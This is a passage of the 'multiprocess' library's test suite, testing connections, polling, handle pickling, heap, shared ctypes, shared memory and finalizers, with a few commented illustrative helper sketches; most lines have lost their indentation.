"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle. This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
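# --- Illustrative sketch (not part of the test suite) ---------------------
# The Listener/Client tests above exercise the high-level connection API:
# Listener() binds an address, Client() connects to it, and accept() returns
# a Connection speaking the same pickle-based protocol as Pipe().  A minimal
# single-process sketch using a helper thread, assuming only the
# standard-library multiprocessing.connection module; it is defined for
# illustration and never called by the tests.
def _sketch_listener_client():
    import threading
    from multiprocessing.connection import Client, Listener
    with Listener() as listener:
        def _connect(address=listener.address):
            # Runs in a helper thread so that accept() below has a peer.
            with Client(address) as c:
                c.send({'answer': 42})
        t = threading.Thread(target=_connect)
        t.start()
        with listener.accept() as server_side:
            assert server_side.recv() == {'answer': 42}
        t.join()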
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
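# --- Illustrative sketch (not part of the test suite) ---------------------
# The _TestPoll cases above depend on Connection preserving message
# boundaries: every send_bytes() is matched by exactly one recv_bytes(), and
# poll() only reports readability without consuming anything.  A standalone
# sketch of that behaviour, assuming the standard-library multiprocessing
# module; it is defined for illustration and never called by the tests.
def _sketch_pipe_message_boundaries():
    import multiprocessing as _mp
    reader, writer = _mp.Pipe(duplex=False)
    writer.send_bytes(b'first')
    writer.send_bytes(b'second')
    assert reader.poll(1.0)                 # readable, nothing consumed yet
    assert reader.recv_bytes() == b'first'  # one complete message at a time
    assert reader.recv_bytes() == b'second'
    reader.close()
    writer.close()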
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocess import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocess.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocess.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Verify __repr__
self.assertIn(sms.name, str(sms))
self.assertIn(str(sms.size), str(sms))
# Test pickling
sms.buf[0:6] = b'pickle'
pickled_sms = pickle.dumps(sms)
sms2 = pickle.loads(pickled_sms)
self.assertEqual(sms.name, sms2.name)
self.assertEqual(sms.size, sms2.size)
        self.assertEqual(bytes(sms.buf[0:6]), bytes(sms2.buf[0:6]))
        self.assertEqual(bytes(sms2.buf[0:6]), b'pickle')
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
            'multiprocess.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
# Test creating a shared memory segment with negative size
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=-1)
# Test creating a shared memory segment with size 0
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=0)
# Test creating a shared memory segment without size argument
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True)
def test_shared_memory_across_processes(self):
# bpo-40135: don't define shared memory block's name in case of
# the failure when we run multiprocessing tests in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify __repr__
self.assertIn(sl.shm.name, str(sl))
self.assertIn(str(list(sl)), str(sl))
# Index Out of Range (get)
with self.assertRaises(IndexError):
sl[7]
# Index Out of Range (set)
with self.assertRaises(IndexError):
sl[7] = 2
# Assign value without format change (str -> str)
current_format = sl._get_packing_format(0)
sl[0] = 'howdy'
self.assertEqual(current_format, sl._get_packing_format(0))
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
        self.assertEqual(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
        self.assertEqual(len(serialized_sl), len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with threading_helper.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
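# --- Illustrative sketch (not part of the test suite) ---------------------
# _TestFinalize above relies on two properties of util.Finalize: calling a
# finalizer runs its callback and unregisters it, and any later call (or the
# tracked object being garbage collected) is a no-op.  A tiny sketch of
# that, assuming the semi-private multiprocessing.util.Finalize API; it is
# never called by the tests and registers nothing at import time.
def _sketch_finalize_runs_once():
    from multiprocessing import util as _mp_util
    calls = []
    class _Anchor:
        pass
    anchor = _Anchor()
    finalizer = _mp_util.Finalize(anchor, calls.append, args=('done',),
                                  exitpriority=0)
    finalizer()   # runs the callback and removes the registry entry
    finalizer()   # second call is a no-op
    assert calls == ['done']
    return calls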
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocess.' + m for m in modules]
modules.remove('multiprocess.__init__')
modules.append('multiprocess')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocess.popen_fork')
modules.remove('multiprocess.popen_forkserver')
modules.remove('multiprocess.popen_spawn_posix')
else:
modules.remove('multiprocess.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocess.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocess.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
